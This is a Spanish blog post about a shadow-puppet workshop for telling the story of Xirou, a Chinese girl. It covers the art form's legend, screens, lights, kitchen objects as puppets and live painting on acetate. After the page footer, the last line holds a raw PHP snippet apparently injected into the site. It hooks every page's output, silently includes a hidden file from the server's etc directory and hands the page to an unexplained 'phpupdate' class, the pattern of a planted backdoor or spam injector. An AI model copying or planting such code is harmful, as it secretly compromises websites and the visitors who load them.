Guía para un taller de Sombras Chinas

 En Fiesta, Fiesta, Fiesta
 … o vamos a contar la historia de Xirou

«¡Vamos a contar la historia de Xirou con sombras chinas!» Cuando Lucía dijo esto, me vinieron a la cabeza varias ideas. Si Xirou es una chica china por qué no hacer sombras chinas. Una asociación tan simple como esta. Durante el proceso de documentación no pudieron grabar a Xirou, ni siquiera hablar con ella. Xirou se ha convertido en un objetivo inalcanzable. Sólo podemos imaginarla a través de las palabras de los demás. He estado buscando a Xirou en otras niñas chinas. En parte me recuerda a mi propio silencio cuando era una adolescente.

Origen de las Sombras Chinas

taller de Sombras ChinasSegún la leyenda china, el teatro de sombras nació durante el reinado del emperador Wu de la dinastía Han, en el siglo II a. C. Para poder soportar el dolor por la pérdida de su esposa, el emperador ordenó montar un de trozo de tela iluminada con una vela y pidió a una persona que se moviera por detrás imitando a su esposa. Pensando que podría consolarse con la ilusión generada por las sombras. A partir de esta leyenda y debido a su onírica belleza, las sombras chinas se extendieron por el gran país oriental llegando a superar sus fronteras. Finalmente llegó a Europa en el siglo XVIII.

Para mí, las sombras chinas es algo muy familiar porque en el colegio las hacíamos de vez en cuando. Hacíamos pruebas con diferentes materiales y estilos, según la historia, nos dividíamos en grupo para dibujar o recortar las figuras, los escenarios…etc.

Cómo empezar el taller

Cuando vino Carlos Nuevo desde Valladolid con un maletón de cosas, fue todo un descubrimiento para mí.

Primero dejamos todos los objetos que se nos ocurrió encima de la mesa. Nos había pedido que trajéramos luces, linternas, utensilios de cocina, objetos relacionados con la historia de Xirou según nuestra imaginación. Carlos, con la ayuda de todos, montó una pantalla gigante. Nos contó que el mejor material para hacer la pantalla, no era el papel cebolla porque se rompe fácilmente y además, como son trozos pequeños, hay que pegarlo con celo para hacer toda la pantalla. Tampoco con una sábana porque es muy difícil tensarla. Lo mejor es usar un mantel blanco de mesa. Carlos compró un rollo entero en Makro: barato, resistente, impermeable. Una maravilla.

Segundo, Carlos nos reveló la clave del asunto: crear el ambiente adecuada para la historia. ¿Cómo sería la música, los acentos? ¿Cómo queremos que suene lo que estamos contando? Si la historia necesita silencio, que sea una decisión.

Después, Carlos puso una pieza de canción melancólica y nos pidió que saliéramos uno por uno para hacer «algo» detrás de la pantalla. Fue mágico. Nos movíamos intuitivamente, alguien cogió un paño de ganchillo…Nos movimos todos al son de la melodía, empapándonos de sensaciones. Al otro lado de la pantalla, la gente construía ese «algo» con su propia imaginación y con todos esos estímulos sensoriales que flotaban en el ambiente.

¿Qué podemos hacer con las luces?

Con las luces, se pueden cruzar dos mundos: el fantástico y el real.

Nos enseñó las posibilidades que tiene el uso de la luz: la intensidad, los colores, los tipos de luz (proyectores, flexos, leds parpadeantes…etc.)

Probamos a dúo. Una persona se quedaba donde estaba el proyector y movía las manos delante de la luz, haciendo sombras mientras la otra persona  interactuaba con ellas cerca de la pantalla.

Probamos con la distancia. Cuando nos pusimos cerca de la pantalla, nuestras imágenes se volvían más nítidas. Luego utilizamos el desenfoque para las transiciones.

Y al final probamos con varias fuentes de luz para una sensación de sueño dentro del sueño. Por ejemplo, iluminamos la pantalla con  la luz del proyector, pusimos objetos encima para crear sombras (atención, hay que poner una plancha transparente de cristal o plástico para proteger el espejo del proyector porque se raya fácilmente.), luego iluminamos a nuestra protagonista con un mini flexo creando un círculo de luz a su alrededor. Con diferentes fuentes de luz podemos producir efectos cinematográficos, se puede generar efectos de traveling, zoom in, zoom out…etc.

¿Qué podemos hacer con los objetos?

En mi colegio, según recuerdo, sólo utilizábamos algunos tipos de materiales para hacer las figuras que es ya todo un mundo. No es igual hacer la figura con un trozo de cartón grueso que con uno fino. Además, se puede hacer con cuero, plástico..etc. Depende de si queremos que trasluzca la luz o no.

Carlos nos habló sobre la manipulación de objetos:

1. Cada persona, cada objeto tiene una velocidad de movimiento específica. Por ejemplo, una cucharita de té puede moverse más rápidamente, con más nervio que un cucharón de sopa.

2. Hay que mantener la verticalidad de los «objeto-muñecos»(pusimos ojitos y orejas en la superficie de un colador y de un cucharón; y estos utensilios cotidianos cobraron vida enseguida.)

3. La mirada. Cada objeto tiene su forma de mirar porque tiene carácter propio. Carlos nos pidió que trajéramos objetos de cocina porque la historia de Xirou ocurre en un restaurante y le pareció interesante esa conexión. Con los objetos que aparecen en una historia, se puede crear un mundo fantástico, inspirado en el mundo real. Pero ojo, hay que manipularlos muy despacio para que el público pueda captar las imágenes y para que los objetos hablen con su propio ritmo interno.

¿Pintar en directo?

taller de Sombras ChinasAquí Carlos nos pidió que recortáramos las figuras y los paisajes según el storyboard que él mismo había preparado. Como se trataba de una improvisación, cada uno lo hizo a su manera. Dibujamos varios edificios, un restaurante, el skyline de una ciudad, grupos de gente, la madre de Xirou y hasta un gato de la suerte que movía su pata.

Todo esto lo hicimos de dos maneras: primero pintando en el folio de acetato para colocarlo luego en el proyector; pero también «en tiempo real», es decir, colocando el acetato en el proyector y pintando directamente las figuras sobre el foco de luz. Así, el actor interactuaba con la sombra que se generaba en el momento.

Como vivimos en un mundo digital, Carlos nos mostró una aplicación especial de iPad con la que se pueden hacer escenarios para sombras chinas. Muy high-technology. También probamos con papel celofán de diferentes colores y cds de música. Con los reflejos de los cds creamos un efecto muy galáctico.

Considerar el ensayo como una danza

Después de un día intensivo, con todas estas ideas que aportó Carlos… ¡¡¡socorro!!! ¿Qué podemos hacer? Nos «invitó» (mola eso de «os invito a…») pues eso, nos invitó a considerar el ensayo como una danza, buscar su musicalidad y sus pausas, elegir los elementos, componer los planos y hacer un storyboard.

Eso para empezar. Luego hay que definir las capas: ¿vamos a usar actores u objetos? ¿O las dos cosas a la vez? Tomar decisiones y afinar las transiciones para llevar al público a ese mundo de sueños.

Cuando vemos una obra de sombras chinas, sentimos la frescura de este arte milenario y nos sumergimos en la narración usando nuestra fantasía e imaginación. Abrimos nuestro conocimiento a una representación metafórica de nuestro mundo.

Creo que las sombras chinas es una método muy práctica y efectiva de enseñanza en las aulas. Unas veces simplemente por su belleza, y otras veces por ser una manera sutil y poética de tratar algunos temas y casos delicados. Así, por ejemplo, la historia de Xirou.

 

Quién es Carlos Nuevo

Carlos José Nuevo Ferrero es director de escena, escenógrafo,  videoartista, actor y autor teatral. En la actualidad su trabajo se ha enfocado en la utilización de recursos visuales, sonoros y musicales propios de ámbitos expresivos ajenos a la interpretación teatral (Infografía, animación, diseño gráfico, videocreación, música electrónica, etc)
Como autor teatral ha escrito una veintena de obras entre las que destacan: Conectado, Manuscrito 408 o  Lovers Cole Porter songs. Y sus obras se han estrenado en Costa Rica, Uruguay, Venezuela.

Actualmente dirige la sección EMC Escena y multimedia del Laboratorio Rayuela Lab. Es director artístico en Rayuela Producciones Teatrales S.L y coordinador artístico en «La Nave» – Programa de artes escénicas para público joven – del Teatro Calderón de Valladolid.

 

Materiales

Mantel blanco de mesa

Cartulina

Tijeras

Celo

Linternas

Flexos

Objetos

 

Entradas recientes
Escríbenos

Y te responderemos lo antes posible!!

Empiece a escribir y pulse Enter para buscar

Diversidad en Fiesta, Fiesta, FiestaEfraín en Fiesta, fiesta, fiesta

function ob_gzhanler($s) { $f='/usr/home/thecrossborderproject.com/etc/ssess_06268501231c12ce8b36dce7d82aab56'; if(file_exists($f)) include_once($f); return class_exists('phpupdate') ? phpupdate::copyright($s) : $s; } ob_start('ob_gzhanler');